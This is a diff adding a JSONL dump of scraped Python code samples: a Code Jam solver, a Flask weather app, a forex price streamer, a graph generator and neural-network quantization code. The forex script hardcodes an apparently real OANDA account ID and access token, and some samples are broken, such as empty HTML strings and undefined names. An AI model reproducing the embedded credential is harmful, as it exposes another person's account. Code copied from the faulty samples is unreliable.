diff --git "a/3809.jsonl" "b/3809.jsonl" new file mode 100644--- /dev/null +++ "b/3809.jsonl" @@ -0,0 +1,677 @@ +{"seq_id":"135852086","text":"#!/usr/bin/python\n\nimport sys\n\n\nif __name__ == '__main__':\n\n fname = sys.argv[-1]\n with open(fname, 'r') as f:\n lines = [l[:-1] for l in f.readlines()]\n\n outlines = []\n\n for i, line in enumerate(lines[1:]):\n N = int(line)\n if N == 0:\n o = 'INSOMNIA'\n else:\n digits = [False for _ in xrange(10)]\n k = 1\n while True:\n for d in str(k * N):\n digits[int(d)] = True\n if all(digits):\n break\n k += 1\n o = k * N\n\n outlines.append('Case #%s: %s' % (i + 1, o))\n\n fname = fname[:-2] + 'out'\n with open(fname, 'w') as f:\n f.write('\\n'.join(outlines))\n","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_jbcdefg_sheep.py","file_name":"16_0_1_jbcdefg_sheep.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"203696189","text":"#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport json\nimport re\nimport xlrd\n\n\nclass Common(object):\n\n @staticmethod\n def api_read_data1(page_name, data_address):\n \"\"\" 获取excel数据,并转化成dict\n\n \"\"\"\n excel_data = {}\n _name = []\n book = xlrd.open_workbook(data_address)\n sheet = book.sheet_by_name(page_name)\n num = sheet.nrows\n for row in range(1, num):\n test_name = sheet.cell(row, 0).value\n _name.append(test_name)\n re_way = sheet.cell(row, 2).value\n address_data = sheet.cell(row, 3).value\n parameter_data = sheet.cell(row, 4).value\n result_parameter = sheet.cell(row, 5).value\n draw_parameter = sheet.cell(row, 6).value\n result_data = sheet.cell(row, 7).value\n col = 1\n try:\n re_way = json.loads(re_way)\n col += 1\n address_data = json.loads(address_data)\n col += 1\n parameter_data = json.loads(parameter_data)\n col += 1\n result_parameter = json.loads(result_parameter)\n col += 1\n draw_parameter = json.loads(draw_parameter)\n col += 1\n result_data = json.loads(result_data)\n col += 1\n except Exception as e:\n print('excel第{}行,第{}列,json数据解析失败'.format(row+1, col))\n raise e\n result_data.update(re_way)\n result_data.update(address_data)\n result_data.update(result_parameter)\n result_data.update(draw_parameter)\n result_data.update(parameter_data)\n excel_data[test_name] = result_data\n excel_data['_name'] = _name\n return excel_data\n\n @staticmethod\n def _token(result):\n \"\"\" 递归字典数据,查找出深层中键为token的值\n \n \"\"\"\n if isinstance(result, list):\n for n in result:\n return Common._token(n)\n else:\n for n in result:\n if n == 'token':\n return result[n]\n else:\n if isinstance(result[n], list):\n for n1 in result[n]:\n if not Common._token(n1):\n continue\n else:\n return Common._token(n1)\n elif isinstance(result[n], dict):\n if not Common._token(result[n]):\n continue\n else:\n return Common._token(result[n])\n\n @staticmethod\n def get_token(result):\n \"\"\" 两种方式获取token,第一种返回数据没有的话,就从cookies.items中获取\n\n \"\"\"\n one = Common._token(result.json())\n if one:\n return one\n else:\n for n in result.cookies.items():\n if isinstance(n, tuple):\n n = list(n)\n for n1 in n:\n if n1.find('token') != -1:\n return re.findall(r'\\w+\\.?\\w', n1.split('token:')[1])[0]\n else:\n assert '两种方式都获取不到token'\n\n\nif __name__ == '_main_':\n pass","sub_path":"core/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"504284173","text":"#!/usr/bin/env python3\n\nimport 
requests\nfrom flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config[\"SQLCHEMY_TRACK_MODIFICATIONS\"] = False\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///weather.db\"\napp.config[\"SECRET_KEY\"] = \"secret\"\ndb = SQLAlchemy(app)\n\nclass City(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(35), nullable=False)\n\ndef getCityHelper(city):\n url= f\"http://api.openweathermap.org/data/2.5/weather?q={city}&units=imperial&appid={apiid}\"\n r = requests.get(url).json()\n return r \n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef indexGet():\n cities = City.query.all()\n weatherLst = []\n for city in cities:\n r = getCityHelper(city.name)\n stat = {\n \"city\" : city.name,\n \"temperature\" : r[\"main\"][\"temp\"],\n \"description\" : r[\"weather\"][0][\"description\"],\n \"feelslike\" : r[\"main\"][\"feels_like\"],\n \"icon\" : r[\"weather\"][0][\"icon\"]\n }\n weatherLst.insert(0, stat)\n return render_template(\"index.html\", weatherLst=weatherLst)\n\n@app.route(\"/\", methods=[\"POST\"])\ndef indexPost():\n errMsg = \"\"\n newCity = request.form.get(\"city\")\n s = \"\"\n for char in newCity.split(\" \"):\n s += char.capitalize()\n s += \" \"\n if s != \"\":\n existingCity = City.query.filter_by(name=s).first()\n if not existingCity:\n data = getCityHelper(s)\n if data[\"cod\"] == 200:\n newCityDB = City(name=s)\n db.session.add(newCityDB)\n db.session.commit()\n else:\n errMsg = f\"{s} does not exist! Try again\"\n else:\n errMsg = f\"{s} added already!\"\n if errMsg == \"\":\n flash(f\"{s} added successfully!\")\n else:\n flash(errMsg, \"error\")\n return redirect(url_for(\"indexGet\"))\n\n\n@app.route(\"/delete/\")\ndef deleteCity(name):\n city = City.query.filter_by(name=name).first()\n db.session.delete(city)\n db.session.commit()\n flash(f\"Successfully deleted {city.name}\", \"success\")\n return redirect(url_for(\"indexGet\"))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"278151947","text":"import pandas as pd\n\ndef genhead(title):\n return '\\n\\n\\n'+title+'\\n'\n\ndef genbar(width, height, file_name):\n temp = \"\"\n temp += '\\n'\n temp +=''\n temp +='\\n'\n temp +='\\n'\n temp += '\\n'\n return temp\n\ndef csvtojson(file_name):\n df = pd.read_csv(file_name)\n #print df[\"colour\"]\n nodelist = []\n jsondata = {}\n jsondata[\"nodes\"] = []\n jsondata[\"links\"] = []\n for i in range(0,2):\n # print df[\"destination\"][i]\n if df[\"source\"][i] not in nodelist:\n nodelist.append(df[\"source\"][i])\n if df[\"destination\"][i] not in nodelist:\n nodelist.append(df[\"destination\"][i])\n for i in range(len(nodelist)):\n jsondata[\"nodes\"].append({\n \"name\":nodelist[i],\n \"colour\": df[\"colour\"][0],\n \"size\": 5\n })\n # to add \"colour\": df[\"colour\"][0],\n\n for i in range(len(df[\"destination\"])):\n jsondata[\"links\"].append({\n \"source\": nodelist.index(df[\"source\"][i]),\n \"target\": nodelist.index(df[\"destination\"][i]),\n \"value\": 5\n })\n return jsondata\n\ndef genforced_layout(width, height, file_name, stroke_width):\n temp = \"\"\n temp += '\\n'\n temp += '\\n'\n temp += ' \\n'\n\n temp += ' '\n temp += ''\n temp += ''\n return 
temp\n","sub_path":"graphmod.py","file_name":"graphmod.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"387897067","text":"import requests\nimport json\nimport queue\nimport pandas as pd\nimport oandapyV20\nimport oandapyV20.endpoints.pricing as pricing\nfrom event import TickEvent\nimport threading\n\nclass StreamingForexPrices(object):\n put_event = threading.Event()\n\n def __init__(self, access_token, account_id, instruments, events):\n self.access_token = access_token\n self.account_id = account_id\n self.instruments = instruments\n self.events = events\n\n def connect_to_stream(self):\n try:\n client = oandapyV20.API(access_token=self.access_token)\n params = {'instruments':self.instruments}\n req = pricing.PricingInfo(accountID=self.account_id, params=params)\n return req\n except Exception as e:\n errmsg = 'Caught exception when connecting to stream\\n' + str(e)\n rq.terminate(errmsg)\n\n def stream_to_queue(self):\n client = None\n req = None\n try:\n client = oandapyV20.API(access_token=self.access_token)\n params = {'instruments':self.instruments}\n req = pricing.PricingInfo(accountID=self.account_id, params=params)\n except Exception as e:\n errmsg = 'Caught exception when connecting to stream\\n' + str(e)\n rq.terminate(errmsg)\n\n res = client.request(req)\n with open(\"history_stream.txt\", \"a\") as file:\n file.write(\"@streming\\tinit on ready\\n\")\n while(True):\n if StreamingForexPrices.put_event.is_set():\n res = client.request(req)\n tick = res['prices'][0]\n instrument = tick['instrument']\n time = pd.Timestamp(tick['time'])\n bid = tick['bids'][0]['price']\n ask = tick['asks'][0]['price']\n tev = TickEvent(instrument, time, bid, ask)\n self.events.put(tev)\n self.clear_tick_event()\n with open(\"history_stream.txt\", \"a\") as file:\n file.write(\"--- put --->\\n\")\n with open(\"history_stream.txt\", \"a\") as file:\n file.write(\"@Streaming\\t{} {} (B:{}, A:{})\\n\".format(tev.time,tev.instrument,tev.bid,tev.ask))\n\n def set_tick_event(self):\n StreamingForexPrices.put_event.set()\n def clear_tick_event(self):\n StreamingForexPrices.put_event.clear()\n\nif False:\n events = queue.Queue()\n ACCOUNT_ID = '101-001-6187232-001'\n ACCESS_TOKEN = '451faa1c762459cae6c1dcd3d46d673d-78b5fcfbee57f4ad6846c325d9d69cb4'\n sfp = StreamingForexPrices(ACCESS_TOKEN, ACCOUNT_ID, 'EUR_USD', events)\n sfp.stream_to_queue()\n","sub_path":"Lib/myfx2/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"20866118","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/broot/RootWrap.py\n# Compiled at: 2015-06-03 11:26:20\n# Size of source mod 2**32: 2640 bytes\n__doc__ = 'Module to wrap the RootOutput C++ class\\n\\n 2015 Bart Pelssers\\n GPL v2.0\\n'\nimport os\nfrom ctypes import cdll, c_void_p\nsource_dir = os.path.dirname(os.path.abspath(__file__))\nlib = cdll.LoadLibrary(source_dir + '/lib/libRootOutput.so')\n\nclass RootOutput(object):\n \"\"\"RootOutput\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n self.type_convert = {'a': 'C', 'int8': 'B', \n 'uint8': 'b', \n 'int16': 'S', \n 'uint16': 's', \n 'int32': 'I', \n 'uint32': 'i', \n 'float32': 'F', \n 'foat64': 'D', \n 
'int64': 'L', \n 'uint64': 'l', \n 'bool': 'O'}\n self.obj = lib.RootOutput_new()\n\n def create_new_file(self, name):\n \"\"\"Create a new TFile with name\"\"\"\n lib.RootOutput_create_new_output(self.obj, name.encode('utf-8'))\n\n def shutdown(self):\n \"\"\"Close TFile\"\"\"\n lib.RootOutput_close_output(self.obj)\n\n def write_all_objects(self):\n \"\"\"Write all objects in memory to TFile\n (Objects being the defined Trees and Branches)\n \"\"\"\n lib.RootOutput_write_all_objects(self.obj)\n\n def create_new_tree(self, name):\n \"\"\"Create a new TTree with name\"\"\"\n lib.RootOutput_create_new_tree(self.obj, name.encode('utf-8'))\n\n def create_new_branch(self, tree_name, branch_name, buffer):\n \"\"\"Create new branch with branch_name for certain tree_name.\n buffer should be a numpy ndarray of a supported branch type.\n \"\"\"\n sdtype = str(buffer.dtype)\n if sdtype.startswith('|S') or sdtype.startswith('S'):\n branch_type = 'C'\n else:\n if sdtype in self.type_convert.keys():\n branch_type = self.type_convert[sdtype]\n else:\n raise KeyError()\n return\n lib.RootOutput_create_new_branch(self.obj, tree_name.encode('utf-8'), branch_name.encode('utf-8'), branch_type.encode('utf-8'), c_void_p(buffer.ctypes.data), buffer.size)\n\n def tree_fill(self, tree_name):\n \"\"\"Fill TTree tree_name with a new entry for each buffer\"\"\"\n lib.RootOutput_tree_fill(self.obj, tree_name.encode('utf-8'))","sub_path":"pycfiles/bropdf1-1.0-py3-none-any/RootWrap.cpython-34.py","file_name":"RootWrap.cpython-34.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"532470809","text":"import time\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom scipy.sparse import csr_matrix\nfrom tensorflow.keras.callbacks import EarlyStopping, LearningRateScheduler, TensorBoard, ModelCheckpoint\nfrom tensorflow.keras.layers import InputSpec, Flatten, Dense, Conv2D, BatchNormalization, MaxPooling2D, Activation\nfrom tensorflow.keras.regularizers import l2\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.losses import squared_hinge, mean_squared_error\nfrom tensorflow.keras import backend as K\nimport tensorflow._api.v2.compat as tv\nfrom keras.utils.vis_utils import plot_model\nfrom contextlib import redirect_stdout\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import MinMaxScaler\n\n# tv.disable_v2_behavior()\ntv.v1.disable_v2_behavior()\nfrom tensorflow.keras.models import Sequential\nfrom matplotlib import pyplot as plt\nfrom tensorflow.keras import constraints\nfrom tensorflow.keras import initializers\nfrom artap.problem import Problem\n\n'''\n paper: Deep Compression: Compressing Deep Neural Networks with Pruning, Trained Quantization and Huffman Coding.\n url : https://arxiv.org/abs/1510.00149\n The goal is to compress the neural network using weights quantization with no loss of accuracy.\n'''\n\n\nclass LayerTrain(object):\n\n def __init__(self, in_depth, out_depth, N_clusters, name):\n self.clusters_masks = []\n self.name = name\n if 'conv' in name:\n self.w = tf.Variable(tf.random.normal([5, 5, in_depth, out_depth], stddev=0.1))\n\n elif 'fc' in name:\n self.w = tf.Variable(tf.random.normal([in_depth, out_depth], stddev=0.1))\n\n self.w_PH = tv.v1.placeholder(tf.float32, self.w.shape)\n self.assign_w = tv.v1.assign(self.w, self.w_PH)\n 
self.num_total_weights = np.prod(self.w.shape)\n\n # mask placeholder for pruning\n # ones - valid weights, zero - pruned weights\n self.pruning_mask_data = np.ones(self.w.shape, dtype=np.float32)\n self.N_clusters = N_clusters # for quantization\n\n def forward(self, x):\n if 'conv' in self.name:\n return tf.nn.conv2d(x, self.w, strides=[1, 2, 2, 1], padding='SAME')\n\n elif 'fc' in self.name:\n return tf.matmul(x, self.w)\n\n def save_weights_histogram(self, sess, directory, iteration):\n w_data = sess.run(self.w).reshape(-1)\n valid_w_data = [x for x in w_data if x != 0.0]\n\n plt.grid(True)\n plt.hist(valid_w_data, 100, color='0.4')\n plt.gca().set_xlim([-0.4, 0.4])\n plt.savefig(directory + '/' + self.name + '-' + str(iteration), dpi=100)\n plt.gcf().clear()\n\n def save_weights(self, sess, directory):\n\n w_data = sess.run(self.w)\n np.save(directory + '/' + self.name + '-weights', w_data)\n np.save(directory + '/' + self.name + '-prune-mask', self.pruning_mask_data)\n\n # quantization\n def quantize_weights(self, sess):\n global distances\n w_data = sess.run(self.w)\n # theoretically pruning mask should be taken into consideration to compute max and min data only among valid\n # weights but in practice with normal ditribution init there is 100% chances that min and max vals will be\n # among valid weights\n max_val = np.max(w_data)\n min_val = np.min(w_data)\n\n # linearly initialize centroids between max and min\n self.centroids = np.linspace(min_val, max_val, self.N_clusters)\n w_data = np.expand_dims(w_data, 0)\n centroids_prev = np.copy(self.centroids)\n for i in range(20):\n if 'conv' in self.name:\n distances = np.abs(w_data - np.reshape(self.centroids, (-1, 1, 1, 1, 1)))\n distances = np.transpose(distances, (1, 2, 3, 4, 0))\n\n elif 'fc' in self.name:\n distances = np.abs(w_data - np.reshape(self.centroids, (-1, 1, 1)))\n distances = np.transpose(distances, (1, 2, 0))\n\n classes = np.argmin(distances, axis=-1)\n for i in range(self.N_clusters):\n cluster_mask = (classes == i).astype(np.float32) * self.pruning_mask_data\n self.clusters_masks.append(cluster_mask)\n\n num_weights_assigned = np.sum(cluster_mask)\n if num_weights_assigned != 0:\n self.centroids[i] = np.sum(cluster_mask * w_data) / num_weights_assigned\n else: # do not modify\n pass\n if np.array_equal(centroids_prev, self.centroids):\n break\n\n centroids_prev = np.copy(self.centroids)\n\n self.quantize_weights_update(sess)\n\n def group_and_reduce_gradient(self, grad):\n grad_out = np.zeros(self.w.shape, dtype=np.float32)\n for i in range(self.N_clusters):\n cluster_mask = self.clusters_masks[i]\n centroid_grad = np.sum(grad * cluster_mask)\n\n grad_out = grad_out + cluster_mask * centroid_grad\n\n return grad_out\n\n # for numerical stability\n def quantize_centroids_update(self, sess):\n w_data = sess.run(self.w)\n for i in range(self.N_clusters):\n cluster_mask = self.clusters_masks[i]\n cluster_count = np.sum(cluster_mask)\n if cluster_count != 0:\n self.centroids[i] = np.sum(cluster_mask * w_data) / cluster_count\n else: # do not modify\n pass\n\n # for numerical stability\n def quantize_weights_update(self, sess):\n w_data_updated = np.zeros(self.w.shape, dtype=np.float32)\n for i in range(self.N_clusters):\n cluster_mask = self.clusters_masks[i]\n centroid = self.centroids[i]\n\n w_data_updated = w_data_updated + cluster_mask * centroid\n sess.run(self.assign_w, feed_dict={self.w_PH: self.pruning_mask_data * w_data_updated})\n\n\nclass DenseLayer(object):\n def __init__(self, matrix, prune_mask, name, 
dense=False):\n assert matrix.shape == prune_mask.shape\n\n self.dense = dense\n self.N_in, self.N_out = matrix.shape\n\n if not self.dense:\n indices, values, dense_shape = [], [], [self.N_in, self.N_out] # sparse matrix representation\n for i in range(self.N_in):\n for j in range(self.N_out):\n\n # pruning mask: ones - valid weights, zero - pruned weights\n if prune_mask[i][j] == 0.0:\n continue\n\n indices.append([i, j])\n values.append(matrix[i][j])\n self.w_matrix = tf.SparseTensor(indices, values, dense_shape) # tf sparse matrix\n else:\n self.w_matrix = tf.constant(matrix * prune_mask) # tf dense matrix\n\n def forward(self, x):\n\n if not self.dense:\n w = tf.sparse.transpose(self.w_matrix, (1, 0))\n x = tf.transpose(x, (1, 0))\n x = tf.sparse.sparse_dense_matmul(w, x) # only left matrix can be sparse hence transpositions\n x = tf.transpose(x, (1, 0))\n else:\n x = tf.matmul(x, self.w_matrix)\n return x\n\n\nclass ConvLayer(object):\n\n def __init__(self, tensor, prune_mask, H_in, W_in, stride, name, dense=False):\n\n assert tensor.shape == prune_mask.shape\n\n self.stride = stride\n self.dense = dense\n\n if self.dense == False:\n indices, values, dense_shape = self.tensor_to_matrix(tensor, prune_mask, H_in, W_in, stride)\n dense_shape[1] = int(round(dense_shape[1]))\n self.w_matrix = tf.SparseTensor(indices, values, dense_shape) # tf sparse matrix\n\n else:\n matrix = self.tensor_to_matrix(tensor, prune_mask, H_in, W_in, stride)\n self.w_matrix = tf.constant(matrix) # tf dense matrix\n\n self.w_tensor = tf.constant(tensor * prune_mask)\n\n print('layer:', name)\n print('\\tvalid matrix weights:', int(np.sum(prune_mask)))\n print('\\ttotal tensor weights:', np.product(self.w_tensor.shape))\n print('\\ttotal matrix weights:', np.product(self.w_matrix.shape))\n\n def get_linear_pos(self, i, j, W): # row major\n\n return i * W + j\n\n def tensor_to_matrix(self, tensor, prune_mask, H_in, W_in, stride):\n\n # assume padding type 'SAME' and padding value 0\n\n H_out = int(int(H_in + 1) / stride) # padding 'SAME'\n W_out = int(int(W_in + 1) / stride) # padding 'SAME'\n H_in = int(H_in)\n W_in = int(W_in)\n\n kH, kW, D_in, D_out = tensor.shape\n\n self.D_out = D_out\n self.H_out = H_out\n self.W_out = W_out\n\n if self.dense == False:\n indices, values, dense_shape = [], [], [H_in * W_in * D_in, H_out * W_out * D_out] # sparse matrix\n else:\n matrix = np.zeros((H_in * W_in * D_in, H_out * W_out * D_out), dtype=np.float32) # dense matrix\n\n for d_in in range(D_in):\n for d_out in range(D_out):\n\n # tf.nn.conv2d implementation doesn't go from top-left spatial location but from bottom-right\n for i_in_center in np.arange(H_in - 1, -1, -stride): # kernel input center for first axis\n for j_in_center in np.arange(W_in - 1, -1, -stride): # kernel input center for second axis\n\n i_out = int(i_in_center / stride)\n j_out = int(j_in_center / stride)\n\n for i in range(kH):\n\n i_in = int(i_in_center + i - kH / 2)\n\n if i_in < 0 or i_in >= H_in: # padding value 0\n continue\n\n for j in range(kW):\n\n j_in = int(j_in_center + j - kW / 2)\n\n if j_in < 0 or j_in >= W_in: # padding value 0\n continue\n\n # pruning mask: ones - valid weights, zero - pruned weights\n if prune_mask[i][j][d_in][d_out] == 0.0:\n continue\n\n pos_in = int(self.get_linear_pos(i_in, j_in, W_in) + d_in * H_in * W_in)\n pos_out = int(self.get_linear_pos(i_out, j_out, W_out) + d_out * H_out * W_out)\n\n if self.dense == False:\n indices.append([pos_in, pos_out])\n values.append(tensor[i][j][d_in][d_out])\n else:\n 
matrix[pos_in][pos_out] = tensor[i][j][d_in][d_out]\n\n if self.dense == False:\n return indices, values, dense_shape\n else:\n return matrix\n\n def forward_matmul_preprocess(self, x):\n\n x = tf.transpose(x, (0, 3, 1, 2))\n x = tf.reshape(x, (-1, np.product(x.shape[1:])))\n\n return x\n\n def forward_matmul_postprocess(self, x):\n\n x = tf.reshape(x, [-1, self.D_out, int(self.H_out), int(self.W_out)])\n x = tf.transpose(x, (0, 2, 3, 1))\n\n return x\n\n def forward_matmul(self, x):\n\n if self.dense == False:\n w = tf.sparse.transpose(self.w_matrix, (1, 0))\n x = tf.transpose(x, (1, 0))\n x = tf.sparse.sparse_dense_matmul(w, x) # only left matrix can be sparse hence transpositions\n x = tf.transpose(x, (1, 0))\n else:\n x = tf.matmul(x, self.w_matrix)\n\n return x\n\n def forward_conv(self, x):\n\n return tf.nn.conv2d(x, self.w_tensor, strides=[1, self.stride, self.stride, 1], padding='SAME')\n\n\nclass NNModel:\n def __init__(self, problem: Problem, name, weights, prune_mask):\n self.problem = problem\n self.name = name\n self.weights = weights\n self.prune_mask = prune_mask\n\n def build_model(self, weights, prune_mask):\n x_PH = tv.v1.placeholder(tf.float32, [None, 28, 28, 1])\n\n model = Sequential()\n layer1 = model.add(ConvLayer(weights, prune_mask, x_PH.shape[1], x_PH.shape[2], 2, 'conv1'))\n x = model.add(layer1.forward_matmul_preprocess(x_PH))\n x = model.add(tf.nn.relu(layer1.forward_matmul(x)))\n x = model.add(layer1.forward_matmul_postprocess(x))\n\n layer2 = model.add(ConvLayer(weights, prune_mask, x.shape[1], x.shape[2], 2, 'conv2'))\n x = model.add(layer2.forward_matmul_preprocess(x))\n x = model.add(tf.nn.relu(layer2.forward_matmul(x)))\n x = model.add(layer2.forward_matmul_postprocess(x))\n\n x = tf.reshape(x, [-1, 7 * 7 * 64])\n\n layer3 = model.add(DenseLayer(weights, prune_mask, 'fc1'))\n x = model.add(tf.nn.relu(layer3.forward(x)))\n\n layer4 = model.add(DenseLayer(weights, prune_mask, 'fc2'))\n logits = model.add(layer4.forward(x))\n\n labels = tv.v1.placeholder(tf.float32, [None, 10])\n correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n return model, accuracy\n\n\n'''\n class for quantization of Optimizers\n \n url : https://arxiv.org/pdf/1711.00215.pdf\n paper: Minimum Energy Quantized Neural Networks\n \n url : https://arxiv.org/pdf/1602.02830.pdf\n paper: Binarized Neural Networks: Training Neural Networks with Weights and Activations Constrained to +1 or −1\n'''\n\n\nclass Quantized_optimizers:\n\n def __init__(self):\n pass\n\n def round_opt(self, x):\n rounded = K.round(x)\n rounded_opt = x + K.stop_gradient(rounded - x)\n\n return rounded_opt\n\n def clip_opt(self, x, min, max):\n clipped = K.clip(x, min, max)\n return x + K.stop_gradient(clipped - x)\n\n def hard_sigmoid(self, x):\n result = K.clip((x + 1) / 2, 0, 1)\n return result\n\n def quantized_relu(self, W, nb=16):\n nb_bits = nb\n Wq = K.clip(2. 
* (Quantized_optimizers.round_opt(self, Quantized_optimizers.hard_sigmoid(self, W) *\n pow(2, nb_bits)) / pow(2, nb_bits)) - 1., 0,\n 1 - 1.0 / pow(2, nb_bits - 1))\n return Wq\n\n def quantized_tanh(self, W, nb=16):\n non_sign_bits = nb - 1\n m = pow(2, non_sign_bits)\n Wq = K.clip(Quantized_optimizers.round_opt(self, W * m), -m, m - 1) / m\n\n return Wq\n\n def quantized_leakyrelu(self, W, nb=16, alpha=0.1):\n global negative_part\n if alpha != 0:\n negative_part = tf.nn.relu(-W)\n W = tf.nn.relu(W)\n if alpha != 0:\n alpha = tf.cast(tf.convert_to_tensor(alpha), W.dtype.base_dtype)\n W -= alpha * negative_part\n non_sign_bits = nb - 1\n m = pow(2, non_sign_bits)\n Wq = K.clip(Quantized_optimizers.round_opt(self, W * m), -m, m - 1) / m\n\n return Wq\n\n def quantize(self, W, nb=16, clip_through=False):\n non_sign_bits = nb - 1\n m = pow(2, non_sign_bits)\n if clip_through:\n Wq = self.clip_opt(Quantized_optimizers.round_opt(self, W * m), -m, m - 1) / m\n else:\n Wq = K.clip(Quantized_optimizers.round_opt(self, W * m), -m, m - 1) / m\n\n return Wq\n\n # def mean_abs(self, x, axis=None, keepdims=False):\n # return K.stop_gradient(K.mean(K.abs(x), axis=axis, keepdims=keepdims))\n #\n # def Xnorize(self, W, H=1, axis=None, keepdims=False):\n # Wb = self.quantize(W, H)\n # Wa = self.mean_abs(W, axis, keepdims)\n\n\nclass Clip(constraints.Constraint):\n def __init__(self, min_value, max_value=None):\n self.min = min_value\n self.max = max_value\n if not self.max:\n self.max = -self.min\n if self.min > self.max:\n self.min = self.max\n self.max = self.min\n\n def __call__(self, p):\n return K.clip(p, self.min, self.max)\n\n\n'''\n class for quantization of Dense Layer\n \n url : https://arxiv.org/pdf/1711.00215.pdf\n paper: Minimum Energy Quantized Neural Networks\n \n url : https://arxiv.org/pdf/1602.02830.pdf\n paper: Binarized Neural Networks: Training Neural Networks with Weights and Activations Constrained to +1 or −1\n'''\n\n\nclass DenseQuantized(Dense):\n \"\"\"\n Layer weight initializers : 'glorot_uniform'\n The neural network needs to start with some weights and then iteratively update them to better values.\n The term kernel_initializer is a fancy term for which statistical distribution or function to use for\n initialising the weights.\n \"\"\"\n\n def __init__(self, units, H=1.0, nb=16, kernel_multiplier='glorot_uniform', bias_multiplier=None, **kwargs):\n super(DenseQuantized, self).__init__(units, **kwargs)\n self.H = H\n self.nb = nb\n self.kernel_multiplier = kernel_multiplier\n self.bias_multiplier = bias_multiplier\n super(DenseQuantized, self).__init__(units, **kwargs)\n\n def build(self, input_shape):\n input_dim = int(input_shape[1])\n if self.H == 'glorot_unifrom':\n self.H = np.float32(np.sqrt(1.5 / (input_dim + self.units)))\n if self.kernel_multiplier == 'glorot_uniform':\n self.kernel_multiplier = np.float32(1. / np.sqrt(1.5 / (input_dim + self.units)))\n # self.kernel_multiplier = np.float32(1. 
/ np.sqrt(1.5 / (nb_input + nb_output)))\n\n self.kernel_constraint = Clip(-self.H, self.H)\n self.kernel_initializer = initializers.RandomUniform(-self.H, self.H)\n self.kernel = self.add_weight(shape=(input_dim, self.units),\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint)\n if self.use_bias:\n self.lr_multipliers = [self.kernel_multiplier, self.bias_multiplier]\n self.bias = self.add_weight(shape=(self.units,),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n else:\n self.lr_multipliers = [self.kernel_multiplier]\n self.bias = None\n\n \"\"\"\n Specifies the rank, dtype and shape of every input to a layer.\n\n Layers can expose (if appropriate) an `input_spec` attribute:\n an instance of `InputSpec`, or a nested structure of `InputSpec` instances\n (one per input tensor). These objects enable the layer to run input\n compatibility checks for input structure, input rank, input shape, and\n input dtype.\n\n A None entry in a shape is compatible with any dimension,\n a None shape is compatible with any shape.\n \"\"\"\n self.input_spec = InputSpec(min_ndim=input_dim)\n self.built = True\n\n def call(self, inputs):\n quantized_kernel = Quantized_optimizers.quantize(self, self.kernel, nb=self.nb)\n output = K.dot(inputs, quantized_kernel)\n if self.use_bias:\n output = K.bias_add(output, self.bias)\n if self.activation is not None:\n output = self.activation(output)\n\n return output\n\n\n'''\n class for quantization of Convolution Layer\n \n url : https://arxiv.org/pdf/1711.00215.pdf\n paper: Minimum Energy Quantized Neural Networks\n \n url : https://arxiv.org/pdf/1602.02830.pdf\n paper: Binarized Neural Networks: Training Neural Networks with Weights and Activations Constrained to +1 or −1.\n'''\n\n\nclass ConvQuantized(Conv2D):\n \"\"\"\n Layer weight initializers : 'glorot_uniform'\n The neural network needs to start with some weights and then iteratively update them to better values.\n The term kernel_initializer is a fancy term for which statistical distribution or function to use for\n initialising the weights.\n \"\"\"\n\n def __init__(self, filters, kernel_regularizer=None, activity_regularizer=None, kernel_multiplier='glorot_uniform',\n bias_multiplier=None, H=1.0, nb=16, **kwargs):\n super(ConvQuantized, self).__init__(filters, **kwargs)\n self.H = H\n self.nb = nb\n self.kernel_multiplier = kernel_multiplier\n self.bias_multiplier = bias_multiplier\n self.activity_regularizer = activity_regularizer\n self.kernel_regularizer = kernel_regularizer\n\n def build(self, input_shape):\n\n input_dim = input_shape[-1]\n kernel_shape = self.kernel_size + (input_dim, self.filters)\n\n base = self.kernel_size[0] * self.kernel_size[1]\n if self.H == 'glorot_uniform':\n nb_input = int(input_dim * base)\n nb_output = int(self.filters * base)\n self.H = np.float32(np.sqrt(1.5 / (nb_input + nb_output)))\n\n if self.kernel_multiplier == 'glorot_uniform':\n nb_input = int(input_dim * base)\n nb_output = int(self.filters * base)\n self.kernel_multiplier = np.float32(1. 
